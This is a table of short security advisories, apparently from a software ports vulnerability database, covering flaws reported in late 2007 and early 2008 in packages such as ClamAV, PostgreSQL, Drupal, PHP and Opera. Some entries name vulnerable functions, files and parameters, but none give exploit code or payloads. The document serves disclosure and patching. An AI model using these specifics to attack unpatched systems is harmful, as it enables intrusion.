| 2008-04-25 | Secunia reports: A vulnerability has been reported in Mailman, which can be exploited by malicious users to conduct script insertion attacks. Certain input when editing the list templates and the list info attribute is not properly sanitised before being stored. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious website is accessed. more... | ja-mailman mailman mailman-with-htdig |
| 2008-04-25 | Secunia reports: The vulnerability is caused due to an error when attaching to a TTY via the -T command line switch. This can be exploited to execute arbitrary commands with the privileges of the user running mksh via characters previously written to the attached virtual console. more... | mksh |
| 2008-04-25 | Hanno Boeck reports: The installer of serendipity 1.3 has various Cross Site Scripting issues. This is considered low priority, as attack scenarios are very unlikely. Various path fields are not escaped properly, thus filling them with javascript code will lead to XSS. MySQL error messages are not escaped, thus the database host field can also be filled with javascript. In the referrer plugin of the blog application serendipity, the referrer string is not escaped, thus leading to a permanent XSS. more... | serendipity serendipity-devel |
| 2008-04-25 | Secunia reports: A vulnerability has been reported in Openfire, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to an unspecified error and can be exploited to cause a Denial of Service. more... | openfire |
| 2008-04-24 | The PostgreSQL developers report: PostgreSQL allows users to create indexes on the results of user-defined functions, known as "expression indexes". This provided two vulnerabilities to privilege escalation: (1) index functions were executed as the superuser and not the table owner during VACUUM and ANALYZE, and (2) that SET ROLE and SET SESSION AUTHORIZATION were permitted within index functions. Both of these holes have now been closed. PostgreSQL allowed malicious users to initiate a denial-of-service by passing certain regular expressions in SQL queries. First, users could create infinite loops using some specific regular expressions. Second, certain complex regular expressions could consume excessive amounts of memory. Third, out-of-range backref numbers could be used to crash the backend. DBLink functions combined with local trust or ident authentication could be used by a malicious user to gain superuser privileges. This issue has been fixed, and does not affect users who have not installed DBLink (an optional module), or who are using password authentication for local access. This same problem was addressed in the previous release cycle, but that patch failed to close all forms of the loophole. more... | postgresql postgresql-server |
| 2008-04-24 | xine Team reports: A new xine-lib version is now available. This release contains a security fix (an unchecked array index that could allow remote attackers to execute arbitrary code via a header structure containing a negative offset, which is used to dereference a function pointer). more... | libxine |
| 2008-04-15 | Secunia reports: Some vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system. 1) A boundary error exists within the "cli_scanpe()" function in libclamav/pe.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted "Upack" executable. Successful exploitation allows execution of arbitrary code. 2) A boundary error within the processing of PeSpin packed executables in libclamav/spin.c can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. 3) An unspecified error in the processing of ARJ files can be exploited to hang ClamAV. more... | clamav clamav-devel |
| 2008-04-13 | Secunia reports: A vulnerability has been reported in lighttpd, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to lighttpd not properly clearing the OpenSSL error queue. This can be exploited to close concurrent SSL connections of lighttpd by terminating one SSL connection. more... | lighttpd |
| 2008-04-13 | The ikiwiki development team reports: Cross Site Request Forging could be used to construct a link that would change a logged-in user's password or other preferences if they clicked on the link. It could also be used to construct a link that would cause a wiki page to be modified by a logged-in user. more... | ikiwiki |
| 2008-04-06 | postfix-policyd-weight does not check for symlinks in its working directory. If the working directory has not already been set up by the superuser, an unprivileged user can link it to other directories in the system. This results in ownership/permission changes on the target directory. more... | postfix-policyd-weight |
| 2008-04-05 | If the system random number generator can be predicted from its past output, then an attacker may spoof Recursor into accepting malicious data. This leads to DNS cache poisoning and client redirection. more... | powerdns-recursor |
| 2008-04-05 | Multiple local privilege escalation vulnerabilities have been found in the symlink verification code. An attacker may use them to run a PHP script with the victim's privileges. This attack is somewhat harder when suphp operates in paranoid mode. For suphp running in owner mode, which is the default in ports, an immediate upgrade to the latest version is advised. more... | suphp |
| 2008-04-05 | Opera Software reports of multiple security issues in Opera. All of them can lead to arbitrary code execution. Details are as the following: Newsfeed prompt can cause Opera to execute arbitrary code Resized canvas patterns can cause Opera to execute arbitrary code more... | linux-opera opera |
| 2008-03-26 | Core Security Technologies reports: A remote buffer overflow vulnerability found in a library used by both the SILC server and client to process packets containing cryptographic material may allow an un-authenticated client to execute arbitrary code on the server with the privileges of the user account running the server, or a malicious SILC server to compromise client systems and execute arbitrary code with the privileges of the user account running the SILC client program. more... | silc-client silc-irssi-client silc-server |
| 2008-03-20 | SecurityFocus reports: The 'bzip2' application is prone to a remote file-handling vulnerability because the application fails to properly handle malformed files. Exploit attempts likely result in application crashes. more... | bzip2 |
| 2008-03-11 | Ian Jackson reports on the debian-security mailinglist: When a block device read or write request is made by the guest, nothing checks that the request is within the range supported by the backend, but the code in the backend typically assumes that the request is sensible. Depending on the backend, this can allow the guest to read and write arbitrary memory locations in qemu, and possibly gain control over the qemu process, escaping from the emulation/virtualisation. more... | qemu qemu-devel |
| 2008-03-10 | Dovecot reports: Security hole in blocking passdbs (MySQL always. PAM, passwd and shadow if blocking=yes) where user could specify extra fields in the password. The main problem here is when specifying "skip_password_check" introduced in v1.0.11 for fixing master user logins, allowing the user to log in as anyone without a valid password. more... | dovecot |
| 2008-03-06 | The Mplayer team reports: A buffer overflow was found in the code used to extract album titles from CDDB server answers. When parsing answers from the CDDB server, the album title is copied into a fixed-size buffer with insufficient size checks, which may cause a buffer overflow. A malicious database entry could trigger a buffer overflow in the program. That can lead to arbitrary code execution with the UID of the user running MPlayer. A buffer overflow was found in the code used to escape URL strings. The code used to skip over IPv6 addresses can be tricked into leaving a pointer to a temporary buffer with a non-NULL value; this causes the unescape code to reuse the buffer, and may lead to a buffer overflow if the old buffer is smaller than required. A malicious URL string may be used to trigger a buffer overflow in the program, that can lead to arbitrary code execution with the UID of the user running MPlayer. A buffer overflow was found in the code used to parse MOV file headers. The code read some values from the file and used them as indexes into an array allocated on the heap without performing any boundary check. A malicious file may be used to trigger a buffer overflow in the program. That can lead to arbitrary code execution with the UID of the user running MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-03-05 | Chris Evans from the Google Security Team reports: Severity: parsing of evil PostScript file will result in arbitrary code execution. A stack-based buffer overflow in the zseticcspace() function in zicc.c allows remote arbitrary code execution via a malicious PostScript file (.ps) that contains a long Range array. more... | ghostscript-gpl ghostscript-gpl-nox11 |
| 2008-02-29 | PCRE developers report: A character class containing a very large number of characters with codepoints greater than 255 (in UTF-8 mode, of course) caused a buffer overflow. more... | pcre |
| 2008-02-27* | Timo Sirainen reports: There are various bugs in up-imapproxy which can crash it. Since up-imapproxy runs in a single process with each connection handled in a separate thread, any crash kills all the connections and stops listening for new ones. In 64bit systems it might be possible to make it leak data (mails, passwords, ..) from other connections to attacker's connection. However I don't think up-imapproxy actually works in any 64bit system so this is just a theoretical problem. more... | pop3proxy up-imapproxy |
| 2008-02-26 | xine Team reports: A new xine-lib version is now available. This release contains a security fix (array index vulnerability which may lead to a stack buffer overflow). more... | libxine |
| 2008-02-26* | MoinMoin Security advisory XSS issue in login action XSS issue in AttachFile action XSS issue in RenamePage/DeletePage action XSS issue in gui editor more... | moinmoin |
| 2008-02-25 | Coppermine Security advisory The development team is releasing a security update for Coppermine in order to counter a recently discovered cross-site-scripting vulnerability. more... | coppermine |
| 2008-02-22 | Opera Software ASA reports about multiple security fixes: Fixed an issue where simulated text inputs could trick users into uploading arbitrary files, as reported by Mozilla. Image properties can no longer be used to execute scripts, as reported by Max Leonov. Fixed an issue where the representation of DOM attribute values could allow cross site scripting, as reported by Arnaud.lb. more... | linux-opera opera opera-devel |
| 2008-02-22 | Secunia Advisory reports: A vulnerability has been reported in OpenLDAP, which can be exploited by malicious users to cause a DoS (Denial of Service). more... | openldap-server |
| 2008-02-15 | iDefense Security Advisory 02.12.08: Remote exploitation of an integer overflow vulnerability in Clam AntiVirus' ClamAV, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code with the privileges of the affected process. The vulnerability exists within the code responsible for parsing and scanning PE files. While iterating through all sections contained in the PE file, several attacker controlled values are extracted from the file. On each iteration, arithmetic operations are performed without taking into consideration 32-bit integer wrap. Since insufficient integer overflow checks are present, an attacker can cause a heap overflow by causing a specially crafted Petite packed PE binary to be scanned. This results in an exploitable memory corruption condition. Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the process using libclamav. In the case of the clamd program, this will result in code execution with the privileges of the clamav user. Unsuccessful exploitation results in the clamd process crashing. Workaround Disabling the scanning of PE files will prevent exploitation. If using clamscan, this can be done by running clamscan with the '--no-pe' option. If using clamdscan, set the 'ScanPE' option in the clamd.conf file to 'no'. more... | clamav |
| 2008-02-13* | Gentoo reports: A remote attacker could entice a user to install a specially crafted "rc" file to execute arbitrary code via long strings in the "Name" and "Comment" fields or via unspecified vectors involving the second vulnerability. more... | libxfce4gui xfce4-panel |
| 2008-02-12 | The cacti development team reports: Multiple security vulnerabilities have been discovered in Cacti's web interface: XSS vulnerabilities Path disclosure vulnerabilities SQL injection vulnerabilities HTTP response splitting vulnerabilities more... | cacti |
| 2008-02-12* | Nico Golde reports: A local attacker could exploit this vulnerability to conduct symlink attacks to overwrite files with the privileges of the user running Claws Mail. more... | claws-mail |
| 2008-02-11 | The ikiwiki development team reports: The htmlscrubber did not block javascript in uris. This was fixed by adding a whitelist of valid uri types, which does not include javascript. Some urls specifiable by the meta plugin could also theoretically have been used to inject javascript; this was also blocked. more... | ikiwiki |
| 2008-02-09 | zenphoto project reports: A new zenphoto version is now available. This release contains security fixes for HTML, XSS, and SQL injection vulnerabilities. more... | zenphoto |
| 2008-02-04 | Greg Wilkins reports: jetty allows remote attackers to bypass protection mechanisms and read the source of files via multiple '/' characters in the URI. more... | jetty |
| 2008-01-31* | Securiweb reports: dircproxy allows remote attackers to cause a denial of service (segmentation fault) via an ACTION command without a parameter, which triggers a NULL pointer dereference, as demonstrated using a blank /me message from irssi. more... | dircproxy dircproxy-devel |
| 2008-01-29 | xine project reports: A new xine-lib version is now available. This release contains a security fix (remotely-exploitable buffer overflow, CVE-2006-1664). (This is not the first time that that bug has been fixed...) It also fixes a few more recent bugs, such as the audio output problems in 1.1.9. more... | libxine |
| 2008-01-23 | Matthieu Herrb of X.Org reports: Several vulnerabilities have been identified in server code of the X window system caused by lack of proper input validation on user controlled data in various parts of the software, causing various kinds of overflows. Exploiting these overflows will crash the X server or, under certain circumstances, allow the execution of arbitrary machine code. When the X server is running with root privileges (which is the case for the Xorg server and for most kdrive based servers), these vulnerabilities can thus also be used to raise privileges. All these vulnerabilities, to be exploited successfully, require either an already established connection to a running X server (and normally running X servers are only accepting authenticated connections), or a shell access with a valid user on the machine where the vulnerable server is installed. more... | libXfont xorg-server |
| 2008-01-20* | A Gentoo Advisory reports: The FreeRADIUS server is vulnerable to an SQL injection attack and a buffer overflow, possibly resulting in disclosure and modification of data and Denial of Service. more... | freeradius freeradius-devel |
| 2008-01-19 | Secunia reports: A vulnerability has been reported in IRC Services, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to the improper handling of overly long passwords within the "default_encrypt()" function in encrypt.c and can be exploited to crash an affected server. more... | ircservices |
| 2008-01-19 | xine project reports: A new xine-lib version is now available. This release contains a security fix (remotely-exploitable buffer overflow, CVE-2008-0225). It also contains a read-past-end fix for an internal library function which is only used if the OS does not supply it and a rendering fix for Darwin/PPC. more... | libxine |
| 2008-01-15 | Geeklog reports: MustLive pointed out a possible XSS in the form to email an article to a friend that we're fixing with this release. Please note that this problem only exists in Geeklog 1.4.0 - neither Geeklog 1.4.1 nor any older versions (1.3.x series) have that problem. more... | geeklog |
| 2008-01-14* | The PHP development team reports: Security Enhancements and Fixes in PHP 5.2.4: Fixed a floating point exception inside wordwrap() (Reported by Mattias Bengtsson) Fixed several integer overflows inside the GD extension (Reported by Mattias Bengtsson) Fixed size calculation in chunk_split() (Reported by Gerhard Wagner) Fixed integer overflow in str[c]spn(). (Reported by Mattias Bengtsson) Fixed money_format() not to accept multiple %i or %n tokens. (Reported by Stanislav Malyshev) Fixed zend_alter_ini_entry() memory_limit interruption vulnerability. (Reported by Stefan Esser) Fixed INFILE LOCAL option handling with MySQL extensions not to be allowed when open_basedir or safe_mode is active. (Reported by Mattias Bengtsson) Fixed session.save_path and error_log values to be checked against open_basedir and safe_mode (CVE-2007-3378) (Reported by Maksymilian Arciemowicz) Fixed a possible invalid read in glob() win32 implementation (CVE-2007-3806) (Reported by shinnai) Fixed a possible buffer overflow in php_openssl_make_REQ (Reported by zatanzlatan at hotbrev dot com) Fixed an open_basedir bypass inside glob() function (Reported by dr at peytz dot dk) Fixed a possible open_basedir bypass inside session extension when the session file is a symlink (Reported by c dot i dot morris at durham dot ac dot uk) Improved fix for MOPB-03-2007. Corrected fix for CVE-2007-2872. more... | php4 php5 |
| 2008-01-11 | The Drupal Project reports: The aggregator module fetches items from RSS feeds and makes them available on the site. The module provides an option to remove items from a particular feed. This has been implemented as a simple GET request and is therefore vulnerable to cross site request forgeries. For example: Should a privileged user view a page containing an tag with a specially constructed src pointing to a remove items URL, the items would be removed. more... | drupal4 drupal5 |
| 2008-01-11 | The Drupal Project reports: When outputting plaintext Drupal strips potentially dangerous HTML tags and attributes from HTML, and escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are invalid in the UTF8 specification are not handled properly by Internet Explorer 6 and may lead it to see a multibyte start character where none is present. Internet Explorer 6 then consumes a number of subsequent UTF-8 characters. This may lead to unsafe attributes that were outside a tag for the filter to appear inside a tag for Internet Explorer 6. This behaviour can then be used to insert and execute javascript in the context of the website. more... | drupal4 drupal5 |
| 2008-01-11 | The Drupal Project reports: When theme .tpl.php files are accessible via the web and the PHP setting register_globals is set to enabled, anonymous users are able to execute cross site scripting attacks via specially crafted links. Drupal's .htaccess attempts to set register_globals to disabled and also prevents access to .tpl.php files. Only when both these measures are not effective and your PHP interpreter is configured with register_globals set to enabled, will this issue affect you. more... | drupal4 drupal5 |
| 2008-01-10 | Secunia reports: A vulnerability has been reported in MaraDNS, which can be exploited by malicious people to cause a Denial of Service. The vulnerability is caused due to an error within the handling of certain DNS packets. This can be exploited to cause a resource rotation by sending specially crafted DNS packets, which cause an authoritative CNAME record to not resolve, resulting in a Denial of Service. more... | maradns |
| 2008-01-07* | Secunia reports: A vulnerability has been reported in LSH, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). more... | lsh |
| 2008-01-04 | Secunia reports: Multiple vulnerabilities have been reported in RealPlayer/RealOne/HelixPlayer, which can be exploited by malicious people to compromise a user's system. An input validation error when processing .RA/.RAM files can be exploited to cause a heap corruption via a specially crafted .RA/.RAM file with an overly large size field in the header. An error in the processing of .PLS files can be exploited to cause a memory corruption and execute arbitrary code via a specially crafted .PLS file. An input validation error when parsing .SWF files can be exploited to cause a buffer overflow via a specially crafted .SWF file with malformed record headers. A boundary error when processing rm files can be exploited to cause a buffer overflow. more... | linux-realplayer |
| 2008-01-03 | Adobe Security bulletin: Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities. Users are recommended to update to the most current version of Flash Player available for their platform. more... | linux-flashplugin |
| 2007-12-31* | A buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl/Tk allows remote attackers to execute arbitrary code via multi-frame interlaced GIF files in which later frames are smaller than the first. more... | tcl tcl-threads tk tk-threads |
| 2007-12-29 | Dovecot reports: If two users with the same password and same pass_filter variables log in within auth_cache_ttl seconds (1h by default), the second user may get logged in with the first user's cached pass_attrs. For example if pass_attrs contained the user's home/mail directory, this would mean that the second user will be accessing the first user's mails. more... | dovecot |
| 2007-12-29* | The Gallery team reports: Gallery 2.2.4 addresses the following security vulnerabilities: Publish XP module - Fixed unauthorized album creation and file uploads. URL rewrite module - Fixed local file inclusion vulnerability in unsecured admin controller and information disclosure in hotlink protection. Core / add-item modules - Fixed Cross Site Scripting (XSS) vulnerabilities through malicious file names. Installation (Gallery application) - Update web-accessibility protection of the storage folder for Apache 2.2. Core (Gallery application) / MIME module - Fixed vulnerability in checks for disallowed file extensions in file uploads. Gallery Remote module - Added missing permissions checks for some GR commands. WebDAV module - Fixed Cross Site Scripting (XSS) vulnerability through HTTP PROPPATCH. WebDAV module - Fixed information (item data) disclosure in a WebDAV view. Comment module - Fixed information (item data) disclosure in comment views. Core module (Gallery application) - Improved resilience against item information disclosure attacks. Slideshow module - Fixed information (item data) disclosure in the slideshow. Print modules - Fixed information (item data) disclosure in several print modules. Core / print modules - Fixed arbitrary URL redirection (phishing attacks) in the core module and several print modules. WebCam module - Fixed proxied request weakness. more... | gallery2 |
| 2007-12-29* | Opera Software ASA reports about multiple security fixes: Fixed an issue where plug-ins could be used to allow cross domain scripting, as reported by David Bloom. Details will be disclosed at a later date. Fixed an issue with TLS certificates that could be used to execute arbitrary code, as reported by Alexander Klink (Cynops GmbH). Details will be disclosed at a later date. Rich text editing can no longer be used to allow cross domain scripting, as reported by David Bloom. See our advisory. Prevented bitmaps from revealing random data from memory, as reported by Gynvael Coldwind. Details will be disclosed at a later date. more... | linux-opera opera opera-devel |
| 2007-12-22* | The Wireshark team reports of multiple vulnerabilities: Wireshark could crash when reading an MP3 file. Beyond Security discovered that Wireshark could loop excessively while reading a malformed DNP packet. Stefan Esser discovered a buffer overflow in the SSL dissector. The ANSI MAP dissector could be susceptible to a buffer overflow on some platforms. The Firebird/Interbase dissector could go into an infinite loop or crash. The NCP dissector could cause a crash. The HTTP dissector could crash on some systems while decoding chunked messages. The MEGACO dissector could enter a large loop and consume system resources. The DCP ETSI dissector could enter a large loop and consume system resources. Fabiodds discovered a buffer overflow in the iSeries (OS/400) Communication trace file parser. The PPP dissector could overflow a buffer. The Bluetooth SDP dissector could go into an infinite loop. A malformed RPC Portmap packet could cause a crash. The IPv6 dissector could loop excessively. The USB dissector could loop excessively or crash. The SMB dissector could crash. The RPL dissector could go into an infinite loop. The WiMAX dissector could crash due to unaligned access on some platforms. The CIP dissector could attempt to allocate a huge amount of memory and crash. Impact: It may be possible to make Wireshark or Ethereal crash or use up available memory by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2007-12-20 | Theodore Y. Ts'o reports: Fix a potential security vulnerability where an untrusted filesystem can be corrupted in such a way that a program using libext2fs will allocate a buffer which is far too small. This can lead to either a crash or potentially a heap-based buffer overflow crash. No known exploits exist, but the main concern is where an untrusted user who possesses privileged access in a guest Xen environment could corrupt a filesystem which is then accessed by thus allowing the untrusted user to gain privileged access in the host OS. Thanks to the McAfee AVERT Research group for reporting this issue. more... | e2fsprogs |
| 2007-12-19 | Luigi Auriemma reports that peercast is vulnerable to a buffer overflow which could lead to a DoS or potentially remote code execution: The handshakeHTTP function which handles all the requests received by the other clients is vulnerable to a heap overflow which allows an attacker to fill the loginPassword and loginMount buffers located in the Servent class with how much data he wants. more... | peercast |
| 2007-12-18* | The Ganglia project reports: The Ganglia development team is pleased to release Ganglia 3.0.6 (Foss) which is available[...]. This release includes a security fix for web frontend cross-scripting vulnerability. more... | ganglia-webfrontend |
| 2007-12-14* | SecurityFocus reports: QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. more... | qemu qemu-devel |
| 2007-12-14* | Mozilla Foundation reports: The Firefox 2.0.0.10 update contains fixes for three bugs that improve the stability of the product. These crashes showed some evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel seamonkey |
| 2007-12-14* | The Mozilla Foundation reports a vulnerability within the mozilla browser. This vulnerability also affects various other browsers like firefox and seamonkey. The vulnerability is caused by QuickTime Media-Link files that contain a qtnext attribute. This could allow an attacker to start the browser with arbitrary command-line options. This could allow the attacker to install malware, steal local data and possibly execute and/or do other arbitrary things within the users context. more... | firefox firefox-ja linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel mozilla seamonkey |
| 2007-12-12 | The Drupal Project reports: The function taxonomy_select_nodes() directly injects variables into SQL queries instead of using placeholders. While taxonomy module itself validates the input passed to taxonomy_select_nodes(), this is a weakness in Drupal core. Several contributed modules, such as taxonomy_menu, ajaxLoader, and ubrowser, directly pass user input to taxonomy_select_nodes(), enabling SQL injection attacks by anonymous users. more... | drupal4 drupal5 |
| 2007-12-12 | Secunia reports: Format string vulnerability in the SMBDirList function in dirlist.c in SmbFTPD 0.96 allows remote attackers to execute arbitrary code via format string specifiers in a directory name. more... | smbftpd |
| 2007-12-10 | Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies. Mortbay Jetty before 6.1.6rc1 does not properly handle "certain quote sequences" in HTML cookie parameters, which allows remote attackers to hijack browser sessions via unspecified vectors. CRLF injection vulnerability in Mortbay Jetty before 6.1.6rc0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors. more... | jetty |
| 2007-12-09* | The live555 development team reports: Fixed a bounds-checking error in "parseRTSPRequestString()" caused by an int vs. unsigned problem. The function which handles the incoming queries from the clients is affected by a vulnerability which allows an attacker to crash the server remotely using the smallest RTSP query possible to use. more... | liveMedia |
| 2007-12-07* | Squid security advisory reports: Due to incorrect bounds checking Squid is vulnerable to a denial of service check during some cache update reply processing. This problem allows any client trusted to use the service to perform a denial of service attack on the Squid service. more... | squid |
| 2007-12-05 | GNU security announcement: GNU Finger unfortunately has not been updated in many years, and has known security vulnerabilities. Please do not use it in production environments. more... | gnu-finger |
| 2007-12-01* | Rails core team reports: All users of Rails 1.2.4 or earlier are advised to upgrade to 1.2.5, though it isn't strictly necessary if you aren't working with JSON. For more information on the JSON vulnerability, see CVE-2007-3227. more... | rubygem-activesupport rubygem-rails |
| 2007-11-27 | Rails core team reports: The rails core team has released ruby on rails 1.2.6 to address a bug in the fix for session fixation attacks (CVE-2007-5380). The CVE Identifier for this new issue is CVE-2007-6077. more... | rubygem-rails |
| 2007-11-27 | The ikiwiki development team reports: Ikiwiki did not check if the path to the srcdir contained a symlink. If an attacker had commit access to the directories in the path, they could change it to a symlink, causing ikiwiki to read and publish files that were not intended to be published. (But not write to them due to other checks.) more... | ikiwiki |
| 2007-11-21 | phpMyAdmin security announcement: The login page auth_type cookie was vulnerable to XSS via the convcharset parameter. An attacker could use this to execute malicious code on the visitor's computer. more... | phpmyadmin |
| 2007-11-17* | ISS X-Force reports: PostNuke is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the admin section using the hits parameter, which could allow the attacker to view, add, modify or delete information in the back-end database. more... | postnuke |
| 2007-11-16 | PHP project reports: Security Enhancements and Fixes in PHP 5.2.5: Fixed dl() to only accept filenames. Reported by Laurent Gaffie. Fixed dl() to limit argument size to MAXPATHLEN (CVE-2007-4887). Reported by Laurent Gaffie. Fixed htmlentities/htmlspecialchars not to accept partial multibyte sequences. Reported by Rasmus Lerdorf. Fixed possible triggering of buffer overflows inside glibc implementations of the fnmatch(), setlocale() and glob() functions. Reported by Laurent Gaffie. Fixed "mail.force_extra_parameters" php.ini directive not to be modifiable in .htaccess due to the security implications. Reported by SecurityReason. Fixed bug #42869 (automatic session id insertion adds sessions id to non-local forms). Fixed bug #41561 (Values set with php_admin_* in httpd.conf can be overwritten with ini_set()). more... | php5 |
| 2007-11-16* | SUN reports: A vulnerability in the Java Runtime Environment (JRE) with applet caching may allow an untrusted applet that is downloaded from a malicious website to make network connections to network services on machines other than the one that the applet was downloaded from. This may allow network resources (such as web pages) and vulnerabilities (that exist on these network services) which are not otherwise normally accessible to be accessed or exploited. more... | jdk linux-blackdown-jdk linux-sun-jdk |
| 2007-11-14* | CVE reports: The SNMP agent (snmp_agent.c) in net-snmp before 5.4.1 allows remote attackers to cause a denial of service (CPU and memory consumption) via a GETBULK request with a large max-repeaters value. more... | net-snmp |
| 2007-11-14* | Secunia Research reports: Secunia Research has discovered some vulnerabilities in Xpdf, which can be exploited by malicious people to compromise a user's system. An array indexing error within the "DCTStream::readProgressiveDataUnit()" method in xpdf/Stream.cc can be exploited to corrupt memory via a specially crafted PDF file. An integer overflow error within the "DCTStream::reset()" method in xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow via a specially crafted PDF file. A boundary error within the "CCITTFaxStream::lookChar()" method in xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow by tricking a user into opening a PDF file containing a specially crafted "CCITTFaxDecode" filter. Successful exploitation may allow execution of arbitrary code. more... | cups-base gpdf kdegraphics koffice poppler xpdf |
| 2007-11-13 | iDefense Labs reports: Remote exploitation of multiple integer overflow vulnerabilities in libFLAC, as included with various vendors' software distributions, allows attackers to execute arbitrary code in the context of the currently logged in user. These vulnerabilities specifically exist in the handling of malformed FLAC media files. In each case, an integer overflow can occur while calculating the amount of memory to allocate. As such, insufficient memory is allocated for the data that is subsequently read in from the file, and a heap based buffer overflow occurs. more... | flac |
| 2007-11-12 | US-CERT reports: webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to cause a denial of service (NULL dereference and daemon crash) via a stats method action to /xml-rpc with (1) an empty Authorization header line, which triggers a crash in the ws_decodepassword function; or (2) a header line without a ':' character, which triggers a crash in the ws_getheaders function. more... | mt-daapd |
| 2007-11-12 | Plone project reports: This hotfix corrects a vulnerability in the statusmessages and linkintegrity modules, where unsafe network data was interpreted as Python pickles. This allows an attacker to run arbitrary Python code within the Zope/Plone process. more... | plone |
| 2007-11-12* | Secunia reports: Secunia Research has discovered a vulnerability in CUPS, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the "ippReadIO()" function in cups/ipp.c when processing IPP (Internet Printing Protocol) tags. This can be exploited to overwrite one byte on the stack with a zero by sending an IPP request containing specially crafted "textWithLanguage" or "nameWithLanguage" tags. Successful exploitation allows execution of arbitrary code. more... | cups-base |
| 2007-11-11 | The DigiTrust Group reports: When creating a new database, a malicious user can use a client-side Web proxy to place malicious code in the db parameter of the POST request. Since db_create.php does not properly sanitize user-supplied input, an administrator could face a persistent XSS attack when the database names are displayed. more... | phpMyAdmin |
| 2007-11-11* | Gentoo reports: Kalle Olavi Niemitalo discovered two boundary errors in fsplib code included in gFTP when processing overly long directory or file names. A remote attacker could trigger these vulnerabilities by enticing a user to download a file with a specially crafted directory or file name, possibly resulting in the execution of arbitrary code or a Denial of Service. more... | gftp |
| 2007-11-09 | Gallery project reports: Gallery 2.2.3 addresses the following security vulnerabilities: Unauthorized renaming of items possible with WebDAV (reported by Merrick Manalastas) Unauthorized modification and retrieval of item properties possible with WebDAV Unauthorized locking and replacing of items possible with WebDAV Unauthorized editing of data file possible via linked items with Reupload and WebDAV (reported by Nicklous Roberts) more... | gallery2 |
| 2007-11-07* | Red Hat reports: A flaw was found in Perl's regular expression engine. Specially crafted input to a regular expression can cause Perl to improperly allocate memory, possibly resulting in arbitrary code running with the permissions of the user running Perl. more... | perl perl-threaded |
| 2007-11-07* | Kevin Finisterre discovered bugs in perl's I/O debug support: The environmental variable PERLIO_DEBUG is honored even by the set-user-ID perl command (usually named sperl or suidperl). As a result, a local attacker may be able to gain elevated privileges. (CVE-2005-0155) A buffer overflow may occur in threaded versions of perl when the full pathname of the script being executed is very long. (CVE-2005-0156). Note: By default, no set-user-ID perl binary is installed. An administrator must enable it manually at build time with the ENABLE_SUIDPERL port flag. more... | perl perl-threaded |
| 2007-11-07* | Jeroen van Wolffelaar reports that the Perl module File::Path contains a race condition wherein traversed directories and files are temporarily made world-readable/writable. more... | perl perl-threaded |
| 2007-11-06 | Debian project reports: Tavis Ormandy of the Google Security Team has discovered several security issues in PCRE, the Perl-Compatible Regular Expression library, which potentially allow attackers to execute arbitrary code by compiling specially crafted regular expressions. more... | pcre pcre-utf8 |
| 2007-11-05 | SEC-Consult reports: Perdition IMAP is affected by a format string bug in one of its IMAP output-string formatting functions. The bug allows the execution of arbitrary code on the affected server. A successful exploit does not require prior authentication. more... | perdition |
| 2007-11-01 | A Secunia Advisory report: Input passed to the "posts_columns" parameter in wp-admin/edit-post-rows.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | de-wordpress wordpress zh-wordpress |
| 2007-10-31* | BugTraq reports: OpenLDAP is prone to multiple remote denial-of-service vulnerabilities because of an incorrect NULL-termination issue and a double-free issue. more... | openldap-server |
| 2007-10-31* | Kazu Nambo reports: URL decoding in the Apache webserver prior to decoding in the Tomcat server could bypass access control rules and give access to pages on a different AJP by sending a crafted URL. more... | mod_jk mod_jk-ap2 |
| 2007-10-27 | Django project reports: A per-process cache used by Django's internationalization ("i18n") system to store the results of translation lookups for particular values of the HTTP Accept-Language header used the full value of that header as a key. An attacker could take advantage of this by sending repeated requests with extremely large strings in the Accept-Language header, potentially causing a denial of service by filling available memory. Due to limitations imposed by Web server software on the size of HTTP header fields, combined with reasonable limits on the number of requests which may be handled by a single server process over its lifetime, this vulnerability may be difficult to exploit. Additionally, it is only present when the "USE_I18N" setting in Django is "True" and the i18n middleware component is enabled*. Nonetheless, all users of affected versions of Django are encouraged to update. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel |
| 2007-10-26* | The DigiTrust Group discovered a serious XSS vulnerability in the phpMyAdmin server_status.php script. According to their report, the vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | phpMyAdmin |
